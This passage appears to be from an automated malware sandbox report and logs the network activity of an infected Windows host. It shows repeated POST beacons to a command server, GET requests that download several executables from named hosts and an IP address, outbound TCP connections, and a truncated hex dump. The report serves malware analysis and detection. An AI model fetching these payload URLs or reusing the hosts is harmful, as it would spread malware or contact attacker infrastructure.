                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vmrsokyf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kuhyti.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jhryuyevsi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tsjnpmoxk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhgvgbi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sthgmss.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lqucepm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drivqge.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://srpcpdlmu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbdfkwshp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /l2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://getygnekfa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://svqaek.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vcddpnrql.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lchxcgbqi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ksxvhtvig.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxrloqgt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aeymga.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://duekablkqo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://foilygkb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://babqykwmy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygspe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sytacviqe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: host-data-coin-11.com
                      Source: global trafficTCP traffic: 192.168.2.5:49804 -> 185.7.214.171:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49902 -> 86.107.197.138:38133
                      Source: global trafficTCP traffic: 192.168.2.5:49823 -> 52.101.24.0:25
                      Source: svchost.exe, 00000006.00000002.567765167.000002717EE5F000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.411996831.000000000542B000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.409119888.000000000542A000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.408591760.0000000005422000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000006.00000002.567765167.000002717EE5F000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000000A.00000002.306093914.0000024F15C13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.comr
                      Source: 8058.exe, 0000001F.00000002.423233100.0000000004011000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000A.00000003.305055330.0000024F15C68000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306331852.0000024F15C6A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000003.305093646.0000024F15C49000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306261450.0000024F15C4E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000A.00000003.305414851.0000024F15C41000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306242274.0000024F15C42000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000A.00000003.305414851.0000024F15C41000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306242274.0000024F15C42000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306093914.0000024F15C13000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.305386938.0000024F15C45000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.306201615.0000024F15C3B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000A.00000003.305093646.0000024F15C49000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306261450.0000024F15C4E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /l3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /l2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1e b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 